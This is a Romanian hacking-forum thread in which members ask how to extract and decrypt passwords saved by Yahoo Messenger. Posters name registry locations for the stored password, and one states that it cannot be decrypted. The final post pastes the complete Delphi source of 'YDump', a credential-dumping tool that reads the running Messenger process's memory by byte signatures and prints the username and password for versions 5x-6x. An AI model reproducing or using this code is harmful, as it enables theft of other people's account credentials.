Yahoo Messenger Decriptare

Hacking and more...
HaCkinG CulT

Lista Forumurilor Pe Tematici

Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.

Nou pe simpatie:
Bianca777 pe Simpatie

Femeie
24 ani
Brasov
cauta Barbat
24 - 61 ani

Hacking and more... / S.O.S. / Yahoo Messenger: Decriptare

Moderat de Shocker

Autor

Mesaj

Pagini: 1

spe3d
Junior+

Inregistrat: acum 17 ani
Postari: 42

cine shie care e fisierul care tine parola la Y!Messenger si daca are cineva un program sal decodez

Modificat de Shocker (acum 17 ani)

_______________________________________
daca gasesti greseli de exprimare la mn tinele pt tine k io mai fac altele.

pus acum 17 ani

M4ST3R
Membru nou

Inregistrat: acum 17 ani
Postari: 12

Din cate stiu eu, YahooMessenger pastreaza parola in registrii NU intrun fisier anume.Deci daca la pornirea messului u selectezi optiunea "Remember My ID & Password" acesta va pastra passul si ID in registrii winului, iar acolo le ascunde foarte bineee!!!! Asa ca slabe sanse ai sa aflii o parola prin metoda asta ...cred.

pus acum 17 ani

ady1266
Elite Member

Din: Bacau
Inregistrat: acum 17 ani
Postari: 1132

ma interesat si pe mine chestia asta!am caut pe google si am gasit pe un forum englezesc ca este fisierul ylogin.dll din D:Program FilesYahoo!Common si trebuieste un program anumea !parca era JEdit sau ceva de genu asta

_______________________________________

pus acum 17 ani

Shocker
Super Moderator

Din: localhost
Inregistrat: acum 18 ani
Postari: 2084

In key-ul HKEY_CURRENT_USERSoftwareYahoopager in ETS gasesti parola encriptata...

_______________________________________
ShockingSoft is back
Freakz only
Comics of the day

pus acum 17 ani

Furiosrexalone
Junior+

Inregistrat: acum 17 ani
Postari: 43

ady1266 a scris:

parca era JEdit sau ceva de genu asta

Din cate stiu eu, JEdit este un IDE pentru limbajul de prgramare Java.

_______________________________________
"Invatati, invatati, invatati." - Lenin

Trimite-mi un mesaj privat.

pus acum 17 ani

AntiTrusT
Senior

Din: C:\WINDOWS\system32\
Inregistrat: acum 17 ani
Postari: 108

sall. Am vazut k in folderul Profiles apar profilele tuturor celor care s-au logat de pe calc respectiv. Acele fisiere se pot decripta pentru a scoate ceva din ele(parola)??
P.S. : Sry pt topicul de la n00bs, nu stiam ca s-a deschis si aici unul

_______________________________________
ERROR: Signature format unknown! Signature cannot be revealed! If the problem persists blow up your computer and try again!

pus acum 17 ani

M4ST3R
Membru nou

Inregistrat: acum 17 ani
Postari: 12

@AntiTrusT
Messul NU pastreaza si nu encripteaza nici o parola in nici un fisier din C:Program FilesYahoo
Modalitatea de stocare si criptare a parolei si a IDului se afla in registrii Windowsului.
Ca sa ai acces la acesti regiostrii faci urmatoarele:
START>>RUN , scrii " regedit " dai OK si gata, ai acces la registri

pus acum 17 ani

AntiTrusT
Senior

Din: C:\WINDOWS\system32\
Inregistrat: acum 17 ani
Postari: 108

Si totusi acolo ce se pastreaza?

_______________________________________
ERROR: Signature format unknown! Signature cannot be revealed! If the problem persists blow up your computer and try again!

pus acum 17 ani

spe3d
Junior+

Inregistrat: acum 17 ani
Postari: 42

In key-ul HKEY_CURRENT_USERSoftwareYahoopager in ETS gasesti parola encriptata...

Si cu ce o decodez??

Modificat de spe3d (acum 17 ani)

_______________________________________
daca gasesti greseli de exprimare la mn tinele pt tine k io mai fac altele.

pus acum 17 ani

nyk_nicosu
Membru nou

Din: De pe Marte
Inregistrat: acum 17 ani
Postari: 14

sincer nu prea ma pricep dar trebuie sa fii putin km bun ca sa o decriptezi parolele de la Yahoo sunt criptate in 1024 biti asa ca si daca ai fun bun ti-ar lua ceva timp.... daca se pricepe cineva va rog sa ne ajutati CA SI VOI ATI FOST CA NOI.

yahoo messenger: decriptare sincer prea pricep dar trebuie fii putin bun decriptezi parolele yahoo

16.5KB

Modificat de nyk_nicosu (acum 17 ani)

_______________________________________
Noi traim prin încurajare si murim fara ea încet, trist si furios...

pus acum 17 ani

OSHO
Elite Member

Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069

Parola NU se poate decripta.

1. E one-way-crypted. Se trimite criptata si se compara cu parola criptata de pe serverul de la yahoo.
2. E un algoritm propriu de criptare, nu unul public ca sa poti gasi pe net hash-uri.

Altfel spus, nu se merita sa iti bati capul doar daca ai un calculator foarte tare (eventual un cluster de mai multe calculatoare) si un brute-forcer foarte bun care sa genereze siruri de caractere si sa le cripteze dupa algoritmul folosit de yahoo.

P.S.
@nyk_nicosu: Nu posta fotografii daca nu au legatura cu topicul.

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

pus acum 17 ani

KILLER.Reloaded
Elite Member

Inregistrat: acum 17 ani
Postari: 721

Exista un program numit YDump care puteai afla parola pe loc dar se pare ca incepand cu versiunea 8 nu mai functioneaza.

Poate gasesc ceva asemanator care sa functioneze si cu versiunea 8.1 desi ma indoiesc.

Voi publica si codul sursa aici, l-am gasit pe un site arab:

Code:

{
Yahoo Messenger Universal PW Dump
vulnerable : All versions of Yahoo! Messenger 5x-6x
http://messenger.yahoo.com/
by : Magic_h2001
Compile with Delphi 5/6/7
THX to : --Elite--
.:: Shabgard Security Group ::.
www.shabgard.org
}

Program YDump;
{$APPTYPE CONSOLE}
uses windows;

const SignUser6x:array[0..5] of byte=($74,$41,$53,$6A,$01,$68);
      SignUser5x:array[0..6] of byte=($01,$00,$00,$FF,$75,$08,$B9);
      SignPass6x:array[0..3] of byte=($00,$8D,$41,$74);
      SignPass5x:array[0..4] of byte=($59,$8B,$F8,$57,$B9);

var  DeskTopHwnd,Yahoo:HWND;
     ClassY:array [0..255] of char;
     Yfound:boolean;
     G_Text:String;

function IsY6x(YHandle:THandle):boolean;
begin
 Result:=FindWindowEx(YHandle,0,'YTopWindow',NIL)<>0;
end;

function YahooDump(YHwnd:THandle; Sign:array of byte; IsUser:boolean;
                   Is6x:boolean; var GText:string):boolean;
Const StartCode=$400000; EndCode=StartCode+$3FFFFF;
      BUFFMAX=1024;
var
  Y_Pid,Y_Proc : THandle;
  BytesRead,Adr,Founds,x,y,SignCount,Cnt : Cardinal;
  Buffer : array[0..BUFFMAX-1] of byte;
  TXT:array[0..63] of byte;
  GetEn:DWORD;
  SSS:string;
begin
 SignCount:=(high(Sign)-low(Sign)+1);
 Result:=false; GText:='';
 Adr:=StartCode;
 Founds:=0; SSS:='';
 GetWindowThreadProcessId (YHwnd,@Y_Pid);
 Y_proc:=OpenProcess (PROCESS_ALL_ACCESS,false,Y_Pid);
 if Y_Proc=0 then Exit;
 try
 repeat
   ReadProcessMemory(Y_Proc, pointer(Adr), @Buffer[0], SizeOf(Buffer), BytesRead);
   if BytesRead<=0 then break;
   x:=0;
   repeat
     If Buffer[x]=Sign[founds] then begin
       founds:=founds+1;
       if founds=SignCount then begin
         if IsUser then begin
           if Is6x then begin
             ReadProcessMemory(Y_Proc, pointer((((Adr+x)-signcount)+1)+6), @GetEn, 4, Cnt);
           end
           else begin
             ReadProcessMemory(Y_Proc, pointer((((Adr+x)-signcount)+1)+7), @GetEn, 4, Cnt);
             GetEn:=GetEn+4;
           end;
         end
         else begin
           if Is6x then begin
             ReadProcessMemory(Y_Proc, pointer((((Adr+x)-signcount)+1)-$0A), @GetEn, 4, Cnt);
             ReadProcessMemory(Y_Proc, pointer(GetEn), @GetEn, 4, Cnt);
             GetEn:=GetEn+$74;
           end
           else begin
             ReadProcessMemory(Y_Proc, pointer((((Adr+x)-signcount)+1)+5), @GetEn, 4, Cnt);
             GetEn:=GetEn+4;
           end
         end;
       ReadProcessMemory(Y_Proc, Pointer(GetEn), @TXT, 64 ,Cnt);
       for y:=0 to 3 do begin
         if not(TXT[y] in[0,32..126]) then begin
           ReadProcessMemory(Y_Proc, pointer(GetEn), @GetEn, 4, Cnt);
           ReadProcessMemory(Y_Proc, Pointer(GetEn), @TXT, 64 ,Cnt);
         end;
       end;
       for y:=0 to 63 do begin
         if TXT[y]=0 then break;
         SSS:=SSS+char(TXT[y]);
       end;
       GTEXT:=SSS;
       Result:=True;
       Exit;
       end;
     end
     else
     begin
         if x>0 then x:=x-founds;
         founds:=0;
     end;
     x:=x+1;
   until x=BytesRead;
   Adr:=Adr+BytesRead;
 until (BytesRead=0) or (Adr > EndCode);
 finally
  CloseHandle(Y_proc);
 end;
end;

begin
 Yfound:=false;
 DeskTopHwnd := GetDeskTopWindow;
 Yahoo:=GetWindow(DeskTopHwnd,GW_CHILD);
 writeln;
 writeln('-------------------------------------------------------');
 writeln('Yahoo! Messenger Password Dump v1.4 - 24/08/2004');
 writeln('For all versions of Yahoo! Messenger');
 writeln('Coded by : Magic_h2001 -  ');
 writeln('Source Code released on : 16/03/2005');
 writeln('Tested on : win9x - me - 2k - xp all SPs !');
 writeln;
 writeln('.:: Shabgard Security Group ::.');
 writeln('    http://www.shabgard.org');
 writeln('    http://www.shabgard.org/forums');
 writeln('    http://magic.shabgard.org');
 writeln('-------------------------------------------------------');
 While Yahoo <> 0 do begin
   GetClassName(Yahoo,ClassY,sizeof(ClassY));
   if string(classY)='YahooBuddyMain' then begin
     G_Text:='';
     Yfound:=true;
     if IsY6x(Yahoo) then begin
       writeln('Yahoo=6x');
       YahooDump(Yahoo,SignUser6x,true, IsY6x(Yahoo),G_Text);
       writeln('User=',G_Text);
       YahooDump(Yahoo,SignPass6x,false,IsY6x(Yahoo),G_Text);
       writeln('Pass=',G_Text);
     end
     else begin
       writeln('Yahoo=5x');
       YahooDump(Yahoo,SignUser5x,true, IsY6x(Yahoo),G_Text);
       writeln('User=',G_Text);
       YahooDump(Yahoo,SignPass5x,false,IsY6x(Yahoo),G_Text);
       writeln('Pass=',G_Text);
     end;
     writeln('-------------------------------------------------------');
   end;
   Yahoo:=GetWindow(Yahoo,GW_HWNDNEXT);
 end;
 if not Yfound then begin
  writeln;
  writeln('Not found any Yahoo! Messenger in Memory !!!');
  writeln;
 end;
 readln;
end.

LE: M-am documentat mai bine in privinta noului protocol YMSGR.
OSHO are dreptate.

Modificat de KILLER.Reloaded (acum 17 ani)

pus acum 17 ani

Pagini: 1

Mergi la